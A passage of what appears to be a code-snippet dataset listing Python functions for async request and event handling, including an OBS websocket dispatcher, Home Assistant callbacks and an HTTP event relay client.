self.loop.run_in_executor(None, self.__get_base_info_api)\r\n api_status_req = self.loop.run_in_executor(None, self.__get_status_api)\r\n api_status_res = yield from api_status_req\r\n api_base_info_res = yield from api_base_info_req\r\n\r\n self.__set_base_info_api(api_base_info_res)\r\n self.__set_status_api(api_status_res)", "async def handle_request(self, request: aioweb.request.Request):", "def callback(self):\n pass # pragma: no cover", "def run(self):\n self.logger.info(\"start consuming api calls\")\n while not self.shutdown:\n self.rpc.listen()", "async def async_update(self):", "def run(self):\n self.initialize()\n\n # run the start callback\n tools.run_callback(\"start\", {'request': self._request})\n\n data = self._request.getData()\n pyhttp = self._request.getHttp()\n config = self._request.getConfiguration()\n\n # allow anyone else to handle the request at this point\n handled = tools.run_callback(\"handle\", \n {'request': self._request},\n mappingfunc=lambda x,y:x,\n donefunc=lambda x:x)\n\n if not handled == 1:\n blosxom_handler(self._request)\n\n # do end callback\n tools.run_callback(\"end\", {'request': self._request})", "async def on_ready(self) -> None:", "def call_async(self, name, *args, **kwargs):", "def ProcessEvents(self):\n self.work_queue.put(self.__ProcessEventsAsync)", "def handle(self) -> None:\r\n\r\n if self.data.get(\"message-id\") != None:\r\n if self.data[\"status\"] == \"error\":\r\n print(self.data[\"error\"])\r\n return\r\n else:\r\n requestData = self.obs.pendingResponses.pop(self.data[\"message-id\"])\r\n request = requestData[\"request-type\"]\r\n #Requests as of version 4.8.0\r\n\r\n #General\r\n if request == \"GetVersion\":\r\n pass\r\n\r\n elif request == \"GetAuthRequired\":\r\n if self.data[\"authRequired\"]:\r\n secret_string: str = self.obs.password + self.data[\"salt\"]\r\n secret_hash: sha256 = sha256(secret_string.encode(\"utf-8\"))\r\n secret: bytes = b64encode(secret_hash.digest())\r\n\r\n response_string: str = secret.decode(\"utf-8\") + self.data[\"challenge\"]\r\n response_hash: sha256 = sha256(response_string.encode(\"utf-8\"))\r\n response: bytes = b64encode(response_hash.digest())\r\n\r\n self.obs.requests.append({\r\n \"type\": \"Authenticate\",\r\n \"auth\": response.decode(\"utf-8\")})\r\n\r\n else:\r\n self.obs.requests.append({\"type\": \"GetSceneList\"})\r\n\r\n elif request == \"Authenticate\":\r\n self.obs.requests.append({\"type\": \"GetSceneList\"})\r\n\r\n elif request == \"SetHeartbeat\":\r\n #To be removed in 5.0.0\r\n pass\r\n\r\n elif request == \"SetFilenameFormatting\":\r\n pass\r\n\r\n elif request == \"GetFilenameFormatting\":\r\n pass\r\n\r\n elif request == \"GetStats\":\r\n pass\r\n\r\n elif request == \"BroadcastCustomMessage\":\r\n pass\r\n\r\n elif request == \"GetVideoInfo\":\r\n pass\r\n\r\n elif request == \"OpenProjector\":\r\n pass\r\n\r\n elif request == \"TriggerHotkeyByName\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"TriggerHotkeyBySequence\":\r\n #Unreleased\r\n pass\r\n\r\n #Media Control\r\n elif request == \"PlayPauseMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"RestartMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StopMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"NextMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"PreviousMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaDuration\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaTime\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"SetMediaTime\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"ScrubMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaState\":\r\n #Unreleased\r\n pass\r\n\r\n #Sources\r\n\r\n elif request == \"GetMediaSourcesList\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetSourcesList\":\r\n pass\r\n\r\n elif request == \"GetSourceTypesList\":\r\n pass\r\n\r\n elif request == \"GetVolume\":\r\n pass\r\n\r\n elif request == \"SetVolume\":\r\n pass\r\n\r\n elif request == \"GetMute\":\r\n pass\r\n\r\n elif request == \"SetMute\":\r\n pass\r\n\r\n elif request == \"ToggleMute\":\r\n pass\r\n\r\n elif request == \"GetAudioActive\":\r\n pass\r\n\r\n elif request == \"SetSourceName\":\r\n pass\r\n\r\n elif request == \"SetSyncOffset\":\r\n pass\r\n\r\n elif request == \"GetSyncOffset\":\r\n pass\r\n\r\n elif request == \"GetSourceSettings\":\r\n pass\r\n\r\n elif request == \"SetSourceSettings\":\r\n pass\r\n\r\n elif request == \"GetTextGDIPlusProperties\":\r\n pass\r\n\r\n elif request == \"SetTextGDIPlusProperties\":\r\n pass\r\n\r\n elif request == \"GetTextFreetype2Properties\":\r\n pass\r\n\r\n elif request == \"SetTextFreetype2Properties\":\r\n pass\r\n\r\n elif request == \"GetBrowserSourceProperties\":\r\n pass\r\n\r\n elif request == \"SetBrowserSourceProperties\":\r\n pass\r\n\r\n elif request == \"GetSpecialSources\":\r\n pass\r\n\r\n elif request == \"GetSourceFilters\":\r\n source = self.obs.getSource(requestData[\"sourceName\"])\r\n if source != None:\r\n for _filter in self.data[\"filters\"]:\r\n source.addFilter(_filter) #type: ignore\r\n\r\n elif request == \"GetSourceFilterInfo\":\r\n pass\r\n\r\n elif request == \"AddFilterToSource\":\r\n pass\r\n\r\n elif request == \"RemoveFilterFromSource\":\r\n pass\r\n\r\n elif request == \"ReorderSourceFilter\":\r\n pass\r\n\r\n elif request == \"MoveSourceFilter\":\r\n pass\r\n\r\n elif request == \"SetSourceFilterSettings\":\r\n pass\r\n\r\n elif request == \"SetSourceFilterVisibility\":\r\n pass\r\n \r\n elif request == \"GetAudioMonitorType\":\r\n pass\r\n\r\n elif request == \"SetAudioMonitorType\":\r\n pass\r\n\r\n elif request == \"TakeSourceScreenshot\":\r\n pass\r\n\r\n #Outpute\r\n elif request == \"ListOutputs\":\r\n pass\r\n\r\n elif request == \"GetOutputInfo\":\r\n pass\r\n\r\n elif request == \"StartOutput\":\r\n pass\r\n\r\n elif request == \"StopOutput\":\r\n pass\r\n\r\n #Profiles\r\n elif request == \"SetCurrentProfile\":\r\n pass\r\n\r\n elif request == \"GetCurrentProfile\":\r\n pass\r\n\r\n elif request == \"ListProfiles\":\r\n pass\r\n\r\n #Recording\r\n elif request == \"GetRecordingStatus\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StartStopRecording\":\r\n pass\r\n\r\n elif request == \"StartRecording\":\r\n pass\r\n\r\n elif request == \"StopRecording\":\r\n pass\r\n\r\n elif request == \"PauseRecording\":\r\n pass\r\n\r\n elif request == \"ResumeRecording\":\r\n pass\r\n\r\n elif request == \"SetRecordingFolder\":\r\n pass\r\n\r\n elif request == \"GetRecordingFolder\":\r\n pass\r\n\r\n #Replay Buffer\r\n elif request == \"GetReplayBufferStatus\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StartStopReplayBuffer\":\r\n pass\r\n\r\n elif request == \"StartReplayBuffer\":\r\n pass\r\n\r\n elif request == \"StopReplayBuffer\":\r\n pass\r\n\r\n elif request == \"SaveReplayBuffer\":\r\n pass\r\n\r\n #Scene Collections\r\n elif request == \"SetCurrentSceneCollection\":\r\n pass\r\n\r\n elif request == \"GetCurrentSceneCollection\":\r\n pass\r\n\r\n elif request == \"ListSceneCollections\":\r\n pass\r\n\r\n #Scene Items\r\n elif request == \"GetSceneItemList\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetSceneItemProperties\":\r\n pass\r\n\r\n elif request == \"SetSceneItemProperties\":\r\n pass\r\n\r\n elif request == \"ResetSceneItem\":\r\n pass\r\n\r\n elif request == \"SetSceneItemRender\":\r\n pass\r\n\r\n elif request == \"SetSceneItemPosition\":\r\n pass\r\n\r\n elif request == \"SetSceneItemTransform\":\r\n pass\r\n\r\n elif request == \"SetSceneItemCrop\":\r\n pass\r\n\r\n elif request == \"DeleteSceneItem\":\r\n pass\r\n\r\n elif request == \"AddSceneItem\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"DuplicateSceneItem\":\r\n pass\r\n\r\n #Scenes\r\n elif request == \"SetCurrentScene\":\r\n pass\r\n\r\n elif request == \"GetCurrentScene\":\r\n self.obs.setCurrentScene(self.data[\"name\"])\r\n\r\n elif request == \"GetSceneList\":\r\n for scene in self.data[\"scenes\"]:\r\n self.obs.addScene(scene)\r\n self.obs.setCurrentScene(self.data[\"current-scene\"])\r\n\r\n elif request == \"CreateScene\":\r\n pass\r\n\r\n elif request == \"ReorderSceneItems\":\r\n pass\r\n\r\n elif request == \"SetSceneTransitionOverride\":\r\n pass\r\n\r\n elif request == \"RemoveSceneTransitionOverride\":\r\n pass\r\n\r\n elif request == \"GetSceneTransitionOverride\":\r\n pass\r\n\r\n #Streaming\r\n elif request == \"GetStreamingStatus\":\r\n pass\r\n\r\n elif request == \"StartStopStreaming\":\r\n pass\r\n\r\n elif request == \"StartStreaming\":\r\n pass\r\n\r\n elif request == \"StopStreaming\":\r\n pass\r\n\r\n elif request == \"SetStreamSettings\":\r\n pass\r\n\r\n elif request == \"GetStreamSettings\":\r\n pass\r\n\r\n elif request == \"SaveStreamSettings\":\r\n pass\r\n\r\n elif request == \"SendCaptions\":\r\n pass\r\n\r\n #Studio Mode\r\n elif request == \"GetStudioModeStatus\":\r\n pass\r\n\r\n elif request == \"GetPreviewScene\":\r\n pass\r\n\r\n elif request == \"SetPreviewScene\":\r\n pass\r\n\r\n elif request == \"TransitionToProgram\":\r\n pass\r\n\r\n elif request == \"EnableStudioMode\":\r\n pass\r\n\r\n elif request == \"DisableStudioMode\":\r\n pass\r\n\r\n elif request == \"ToggleStudioMode\":\r\n pass\r\n\r\n #Transitions\r\n elif request == \"GetTransitionList\":\r\n pass\r\n\r\n elif request == \"GetCurrentTransition\":\r\n pass\r\n\r\n elif request == \"SetCurrentTransition\":\r\n pass\r\n\r\n elif request == \"SetTransitionDuration\":\r\n pass\r\n\r\n elif request == \"GetTransitionDuration\":\r\n pass\r\n\r\n elif request == \"GetTransitionPosition\":\r\n pass\r\n\r\n else:\r\n print(f\"Unhandled response of type {request} and data {self.data}.\")\r\n\r\n \r\n\r\n else:\r\n event: str = self.data[\"update-type\"]\r\n #Events as of 4.8.0\r\n\r\n #Scenes\r\n if event == \"SwitchScenes\":\r\n self.obs.setCurrentScene(self.data[\"scene-name\"])\r\n\r\n elif event == \"ScenesChanged\":\r\n #self.obs.purgeScenes()\r\n pass\r\n\r\n elif event == \"SceneCollectionChanged\":\r\n pass\r\n\r\n elif event == \"SceneCollectionListChanged\":\r\n pass\r\n\r\n #Transitions\r\n elif event == \"SwitchTransition\":\r\n pass\r\n\r\n elif event == \"TransitionListChanged\":\r\n pass\r\n\r\n elif event == \"TransitionDurationChanged\":\r\n pass\r\n\r\n elif event == \"TransitionBegin\":\r\n pass\r\n\r\n elif event == \"TransitionEnd\":\r\n pass\r\n\r\n elif event == \"TransitionVideoEnd\":\r\n pass\r\n\r\n #Profiles\r\n elif event == \"ProfileChanged\":\r\n pass\r\n\r\n elif event == \"ProfileListChanged\":\r\n pass\r\n\r\n #Streaming\r\n elif event == \"StreamStarting\":\r\n pass\r\n\r\n elif event == \"StreamStarted\":\r\n pass\r\n\r\n elif event == \"StreamStopping\":\r\n pass\r\n\r\n elif event == \"StreamStopped\":\r\n pass\r\n\r\n elif event == \"StreamStatus\":\r\n pass\r\n\r\n #Recording\r\n elif event == \"RecordingStarting\":\r\n pass\r\n\r\n elif event == \"RecordingStarted\":\r\n pass\r\n\r\n elif event == \"RecordingStopping\":\r\n pass\r\n\r\n elif event == \"RecordingStopped\":\r\n pass\r\n\r\n elif event == \"RecordingPaused\":\r\n pass\r\n\r\n elif event == \"RecordingResumed\":\r\n pass\r\n\r\n #Replay Buffer\r\n elif event == \"ReplayStarting\":\r\n pass\r\n\r\n elif event == \"ReplayStarted\":\r\n pass\r\n\r\n elif event == \"ReplayStopping\":\r\n pass\r\n\r\n elif event == \"ReplayStopped\":\r\n pass\r\n\r\n #Other\r\n elif event == \"Exiting\":\r\n pass\r\n\r\n #General\r\n elif event == \"Heartbeat\":\r\n pass\r\n\r\n elif event == \"BroadcastCustomMessage\":\r\n pass\r\n\r\n #Sources\r\n elif event == \"SourceCreated\":\r\n pass\r\n\r\n elif event == \"SourceDestroyed\":\r\n pass\r\n\r\n elif event == \"SourceVolumeChanged\":\r\n pass\r\n\r\n elif event == \"SourceMuteStateChanged\":\r\n pass\r\n\r\n elif event == \"SourceAudioDeactivated\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"SourceAudioActivated\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"SourceAudioSyncOffsetChanged\":\r\n pass\r\n\r\n elif event == \"SourceAudioMixersChanged\":\r\n pass\r\n\r\n elif event == \"SourceRenamed\":\r\n pass\r\n\r\n elif event == \"SourceFilterAdded\":\r\n pass\r\n\r\n elif event == \"SourceFilterRemoved\":\r\n pass\r\n\r\n elif event == \"SourceFilterVisibilityChanged\":\r\n source = self.obs.getSource(self.data[\"sourceName\"])\r\n if source != None:\r\n _filter = source.getFilter(self.data[\"filterName\"]) #type: ignore\r\n if _filter != None:\r\n _filter.setVisible(self.data[\"filterEnabled\"]) #type: ignore\r\n\r\n elif event == \"SourceFiltersReordered\":\r\n pass\r\n\r\n #Media\r\n elif event == \"MediaPlaying\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaPaused\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaRestarted\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaStopped\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaNext\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaPrevious\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaStarted\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaEnded\":\r\n #Unreleased\r\n pass\r\n\r\n #Scene Items\r\n elif event == \"SceneItemOrderChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemAdded\":\r\n pass\r\n\r\n elif event == \"SceneItemRemoved\":\r\n pass\r\n\r\n elif event == \"SceneItemVisibilityChanged\":\r\n scene = self.obs.getScene(self.data[\"scene-name\"])\r\n if scene != None:\r\n source = scene.getSource(self.data[\"item-name\"]) #type: ignore\r\n if source != None:\r\n source.setVisible(self.data[\"item-visible\"]) #type: ignore\r\n \r\n\r\n elif event == \"SceneItemLockChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemTransformChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemSelected\":\r\n pass\r\n\r\n elif event == \"SceneItemDeselected\":\r\n pass\r\n\r\n #Studio Mode\r\n elif event == \"PreviewSceneChanged\":\r\n pass\r\n\r\n elif event == \"StudioModeSwitched\":\r\n pass\r\n\r\n #Unhandled Events\r\n else:\r\n print(\"Unhandled event with data: \" + str(self.data))", "def on_success(self):\n pass", "async def send(self):", "def dispatch(self, sender, event, *args, **kwargs):\n pass # pragma: no cover", "def _dispatch(self, api):\n self._authorize(api)\n self._handle(api)", "def on_iteration(self):\n self.send_pending_requests()\n super().on_iteration()", "async def _async_scan(self) -> None:\n for callback in self._request_callbacks:\n callback()\n await self._async_scan_serial()", "def run(self):\n while self.running:\n self.handle_request()", "def work(self, request):\n raise NotImplementedError", "def serve(self):\r\n self.channel.wait()\r\n handler, seq, obj = self._recv()\r\n if handler == \"result\":\r\n self.dispatch_result(seq, obj)\r\n elif handler == \"exception\":\r\n self.dispatch_exception(seq, obj)\r\n else:\r\n self.dispatch_request(handler, seq, obj)", "def events(self):", "def on_get(self, req, resp, task_id):\n task_result = AsyncResult(task_id)\n result = {'status': task_result.status, 'result': task_result.result}\n resp.status = falcon.HTTP_200\n resp.body = json.dumps(result)", "async def events(self) -> Iterable[Event]:", "def test_future_event(self):\n pass", "async def start(self):", "async def start(self):", "async def async_setup(self):\n\n async def async_update(event_time):\n \"\"\"Update device.\"\"\"\n queue = [entry for entry in self._queue[0:PARALLEL_CALLS]]\n for _ in queue:\n self._queue.append(self._queue.pop(0))\n\n for data_class in queue:\n if data_class[\"next_scan\"] > time():\n continue\n self._data_classes[data_class[\"name\"]][\"next_scan\"] = (\n time() + data_class[\"interval\"]\n )\n try:\n self.data[\n data_class[\"name\"]\n ] = await self.hass.async_add_executor_job(\n partial(data_class[\"class\"], **data_class[\"kwargs\"],),\n self._auth,\n )\n async_dispatcher_send(\n self.hass, f\"netatmo-update-{data_class['name']}\"\n )\n except (pyatmo.NoDevice, pyatmo.ApiError) as err:\n _LOGGER.debug(err)\n\n async_track_time_interval(\n self.hass, async_update, timedelta(seconds=SCAN_INTERVAL)\n )\n\n async def handle_event(event):\n \"\"\"Handle webhook events.\"\"\"\n if event.data[\"data\"][\"push_type\"] == \"webhook_activation\":\n _LOGGER.info(\"%s webhook successfully registered\", MANUFACTURER)\n self._webhook = True\n\n self.hass.bus.async_listen(\"netatmo_event\", handle_event)", "def on_open(self):\n def event_loop():\n logger.debug(pformat(self.query.request))\n self.send(json.dumps(self.query.request))\n while not self.event.is_set():\n #print('Waiting around on the socket: %s' % self.gettimeout())\n self.event.wait(self.gettimeout())\n \n logger.debug('Event loop terminating.')\n \n self.thread = threading.Thread(\n target=event_loop)\n self.thread.setDaemon(True)\n self.thread.start()", "def _async_process_data(self):\n raise NotImplementedError", "async def on_start(self):", "def process(self, event):\n pass", "def event_queue_proc(self,event):\r\n event()", "async def async_update(self):\n await self.wrapper.async_request_refresh()", "def handle_io_event(self, data):\n getattr(\n self,\n 'control_{}'.format(self.model)\n )(data['action'])\n self.update_serverside_status({\n 'action': data['action'], 'event_id': data['event_id']\n })", "def console_request(self, evt, proto):\n if evt.kind == sugar.transport.ServerMsgFactory.TASK_RESPONSE:\n threads.deferToThread(self.on_broadcast_tasks, evt, proto)", "def main():\n\n context = yield from Context.create_client_context()\n\n yield from asyncio.sleep(2)\n\n payload = b\"0\"\n request = Message(code=PUT, payload=payload)\n request.opt.uri_host = '192.168.3.2'\n request.opt.uri_path = (\"nodes\", \"48102\", \"humidity\")\n\n response = yield from context.request(request).response\n\n print('Result: %s\\n%r'%(response.code, response.payload))", "async def start_events_async(self) -> None:\n raise NotImplementedError(\"start_events_async must be implemented for {}\".format(self.__class__.__name__))", "def async_event_handler(self, event: dict) -> None:\n if event['e'] == 'added':\n\n if event['r'] == 'lights' and event['id'] not in self.lights:\n device_type = 'light'\n device = self.lights[event['id']] = DeconzLight(\n event['id'], event['light'], self.async_put_state)\n\n elif event['r'] == 'sensors' and event['id'] not in self.sensors:\n if supported_sensor(event['sensor']):\n device_type = 'sensor'\n device = self.sensors[event['id']] = create_sensor(\n event['id'], event['sensor'], self.async_put_state)\n else:\n _LOGGER.warning('Unsupported sensor %s', event)\n return\n\n else:\n _LOGGER.debug('Unsupported event %s', event)\n return\n\n if self.async_add_device_callback:\n self.async_add_device_callback(device_type, device)\n\n elif event['e'] == 'changed':\n\n if event['r'] == 'groups' and event['id'] in self.groups:\n self.groups[event['id']].async_update(event)\n\n elif event['r'] == 'lights' and event['id'] in self.lights:\n self.lights[event['id']].async_update(event)\n self.update_group_color([event['id']])\n\n elif event['r'] == 'sensors' and event['id'] in self.sensors:\n self.sensors[event['id']].async_update(event)\n\n else:\n _LOGGER.debug('Unsupported event %s', event)\n\n elif event['e'] == 'deleted':\n _LOGGER.debug('Removed event %s', event)\n\n else:\n _LOGGER.debug('Unsupported event %s', event)", "async def start(self) -> None:", "def __call__(self, **kwargs):\n kwargs.setdefault('timeout', self.timeout)\n kwargs.setdefault('send_line', self.send_line)\n kwargs['process_results'] = self.process_results\n return async_events(self.context, self.events, **kwargs)", "async def async_update(self) -> None:\n return", "def on(self) -> None:", "async def async_event(self, event: str, *args, **kwargs):\n for cb in self.event_handlers[event]:\n asyncio.ensure_future(cb(*args, **kwargs), loop=self.loop)", "def _request(self, *args):\n raise NotImplementedError", "def sync_start(self):", "def _request(self, *args):\n self._silent_request(*args)\n return self._get_response()", "async def async_update(self) -> None:\n raise NotImplementedError()", "async def async_update(self) -> None:\n raise NotImplementedError()", "async def server_event_trigger(self, event):\n event_data = event[\"event_data\"]\n await self.send_json(event_data)", "def process_event(self, event):\r\n pass", "def _send_to_endpoint(self, events):\n raise NotImplementedError('Please implement _send_to_endpoint().')", "async def on_connect(self) -> None:", "def _async_update_callback(self):\n self._async_update_device_data()\n self.async_write_ha_state()", "def client_request(self, evt):\n threads.deferToThread(self.cli_db.accept, evt)", "async def execute(self):\n return True", "async def execute(self):\n return True", "async def execute(self):\n return True", "async def execute(self):\n return True", "async def execute(self):\n return True", "async def execute(self):\n return True", "def processEvent(self):\n # Note: break out of event dispatch loop when closedown event is received\n # and closing flag is set. This is to prevent DoS attack by faked closedown\n # event type, and to ensure that prior events received are all processed.\n delay_on_error_min = 0.125 # Back off retry interval on error..\n delay_on_error_max = 20.0 # ..\n delay_on_error = delay_on_error_min # ..\n while True:\n if delay_on_error < delay_on_error_max:\n delay_on_error *= 2\n try:\n # PLEASE NOTE: In the event that the HTTPC is run as duplex, not simplex\n # then the post methods will be delayed if nothing is sent down to the client\n # from the server. This timeout is controlled by QUEUE_WAIT_TIMEOUT in EventRouterHTTPS.py\n if self._simplex == True:\n self._queueEvent.wait()\n self._queueEvent.clear()\n \n if not self._queue.empty():\n Trace(\"%s queue.get ...\"%(self.getUri()), \"EventLib.EventRelayHTTPC\")\n ###msgbody = self._queue.get()\n ###Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n ###self._event.set()\n msgbody = self.getQueuedItem()\n [typ,env] = msgbody\n if typ == \"closedown\":\n if self._closing: break\n else:\n # process request as an HTTP POST request\n data = makeEnvelopeData(env)\n headers = { \"Content-type\": \"text/plain\",\n \"Accept\": \"text/plain\",\n \"Content-length\": str(len(data)) }\n self._httpcon.request(\"POST\", \"/request_path_ignored\", data, headers)\n response = self._httpcon.getresponse()\n delay_on_error = delay_on_error_min\n elif self._simplex == False:\n # Nothing in queue:\n # issue a GET for incoming events\n _log.info(\"%s HTTP get ...\"%(self.getUri()))\n headers = { \"Accept\": \"text/plain\" }\n self._httpcon.request(\"GET\", \"/request_path_ignored\", None, headers)\n response = self._httpcon.getresponse()\n if response.status == 200:\n delay_on_error = delay_on_error_min\n msgbody = response.read()\n Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n # Parse message and act accordingly\n msgdata = parseMessageData(msgbody)\n Trace(\"%s get msgdata: %s\"%(self.getUri(),str(msgdata)), \"EventLib.EventRelayHTTPC\")\n if msgdata == None:\n #TODO: Log \"Request body malformed\"\n pass\n elif msgdata[0] == \"forward\":\n # msgdata = [\"forward\", [['R1', 'R2', 'R3'], 'ev:typ', 'ev:src', 'payload']]\n event = makeEvent(evtype=msgdata[1][1],source=msgdata[1][2],payload=msgdata[1][3])\n env = constructEnvelope(msgdata[1][0], event)\n self.forward(event, env)\n elif msgdata[0] == \"idle\":\n # Idle response gives client a chance to send if anything is queued\n pass\n else:\n #TODO: handle closedown message?\n Warn( \"%s Request body unrecognized option: %s\"%(self.getUri(),msgdata[0]), \"EventRelayHTTPC\")\n pass\n elif response.status == 503:\n Trace( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n # Remote end closed down\n break\n else:\n # TODO: (log error response)\n Warn( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n \n except httplib.BadStatusLine, e:\n # This can happen at closedown\n Info( \"%s processEvent bad response: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.CannotSendRequest, e:\n # This can happen at closedown\n Info( \"%s Cannot send request: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.ResponseNotReady, e:\n # This can happen at startup and sometimes other times:\n # maybe multiple requests on a single HTTP connection object?\n Info( \"%s Response not ready: (%s)\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except socket.error, e:\n Warn( \"%s Socket error: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n return", "async def async_update(self):\n\n await self.status_request()", "def _dispatch(self, body):\n pass", "def _handle_first_request(self):\n pass", "def answer_waiting_call(self) -> None:", "def _dispatch(self, method, params):\n logging.debug('Calling %s%s', method, params)\n self._rpc_received_event.set()\n return SimpleJSONRPCServer.SimpleJSONRPCServer._dispatch(\n self, method, params)", "async def event_handler(self, response):\n data = ujson.loads(response.data)\n if isinstance(data, dict):\n if data['event'] == 'subscribed':\n print('Subscribed to channel: {0}, for pair: {1}, on channel ID: {2}'.format(data['channel'], data['pair'], data['chanId']))\n self.channel_mapping[data['chanId']] = (data['channel'], data['pair'])\n elif data['event'] == 'info':\n print('Exchange: {0} Websocket version: {1}'.format(self.id, data['version']))\n elif isinstance(data, list):\n if isinstance(data[1], str):\n print('Heartbeat on channel {0}'.format(data[0]))\n else:\n # Published data, time stamp and send to appropriate queue\n timestamp = self.microseconds() / 1000\n datetime = self.iso8601(timestamp)\n if self.channel_mapping[data[0]][0] == 'book':\n pair_id = self.channel_mapping[data[0]][1]\n await self.queues['orderbooks'][pair_id].put((data, timestamp, datetime))", "def run(self, event):\n pass", "def _http_thread_func(self):\r\n while not self._terminating:\r\n # pop queued request from the queue and process it\r\n (api_endpoint, params, reqid) = self.http_requests.get(True)\r\n translated = None\r\n try:\r\n answer = self.http_signed_call(api_endpoint, params)\r\n if answer[\"result\"] == \"success\":\r\n # the following will reformat the answer in such a way\r\n # that we can pass it directly to signal_recv()\r\n # as if it had come directly from the websocket\r\n translated = {\r\n \"op\": \"result\",\r\n \"result\": answer[\"data\"],\r\n \"id\": reqid\r\n }\r\n else:\r\n if \"error\" in answer:\r\n if answer[\"token\"] == \"unknown_error\":\r\n # enqueue it again, it will eventually succeed.\r\n self.enqueue_http_request(api_endpoint, params, reqid)\r\n else:\r\n\r\n # these are errors like \"Order amount is too low\"\r\n # or \"Order not found\" and the like, we send them\r\n # to signal_recv() as if they had come from the\r\n # streaming API beause Gox() can handle these errors.\r\n translated = {\r\n \"op\": \"remark\",\r\n \"success\": False,\r\n \"message\": answer[\"error\"],\r\n \"token\": answer[\"token\"],\r\n \"id\": reqid\r\n }\r\n\r\n else:\r\n self.debug(\"### unexpected http result:\", answer, reqid)\r\n\r\n except Exception as exc:\r\n # should this ever happen? HTTP 5xx wont trigger this,\r\n # something else must have gone wrong, a totally malformed\r\n # reply or something else.\r\n #\r\n # After some time of testing during times of heavy\r\n # volatility it appears that this happens mostly when\r\n # there is heavy load on their servers. Resubmitting\r\n # the API call will then eventally succeed.\r\n self.debug(\"### exception in _http_thread_func:\",\r\n exc, api_endpoint, params, reqid)\r\n\r\n # enqueue it again, it will eventually succeed.\r\n self.enqueue_http_request(api_endpoint, params, reqid)\r\n\r\n if translated:\r\n self.signal_recv(self, (json.dumps(translated)))\r\n\r\n self.http_requests.task_done()", "def handleEvents(self, events):\n pass", "def handle(self) -> None:", "def handle_execution_response(self, data, *, wait):\n ...", "def handle_event(event, context):\n print(\"Executing...\")\n router = Router(ROUTE_MAP)\n return router.route_request(event, context)", "def ServiceRequest(self):\n #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n pass", "def _run_all_pending_events(self):\n # pending = asyncio.all_tasks(self.loop)\n # self.loop.run_until_complete(asyncio.gather(*pending))\n async def _fn():\n pass\n future = asyncio.ensure_future(_fn())\n self.loop.run_until_complete(future)", "def perform_callback(self, *args, **kwargs):\n pass", "def on_event_finished(self, event):", "def __call__(self):\n hub.sleep(random.randint(1, self.interval))\n while True:\n self.send_req()\n self.reply_pending = True\n hub.sleep(self.interval)\n if self.reply_pending:\n self.no_response()", "def async_request(self, callback, *args):\r\n seq = self.send_request(*args)\r\n self.async_replies[seq] = callback", "def on_get(self, req, resp):\n try:\n n_reqs = int(req.params.get('n', self.default_reqs))\n except ValueError:\n error_response(resp, 'ERROR: Incorrect number of requests')\n return\n\n urls = self.scheduler.requests(n_reqs)\n resp.data = json.dumps(urls, ensure_ascii=True)\n resp.content_type = \"application/json\"\n resp.status = falcon.HTTP_200", "def on(self) -> None:\n ...", "def after_send(self):", "async def run_requests(self):\n loop = asyncio.get_event_loop()\n tasks = []\n async with aiohttp.ClientSession(connector=self.connector) as session:\n\n for index, id in enumerate(self.ids):\n if id not in self.processed_ids:\n url = self.base_url + id\n auth_token = base64.b64encode(id.encode('ascii'))\n header = {\"Authorization\": auth_token.decode('UTF-8')}\n tasks.append(asyncio.ensure_future(self._request_one(url=url, header=header, id=id, index = index, session = session)))\n\n _ = await asyncio.gather(*tasks)", "async def __call__(self, method, url, data):\n if self.stopping:\n raise ClientError()\n await self.semaphore.acquire()\n kwargs = self.response_list.pop(0)\n return AiohttpClientMockResponse(method=method, url=url, **kwargs)", "async def async_update(self):\n await self.coordinator.async_request_refresh()", "def onRequestStart(self, api, request):\n logging.info('Request start ({})'.format(request))", "def _post_sync(self):", "def on_response(self, response):\n pass" ]
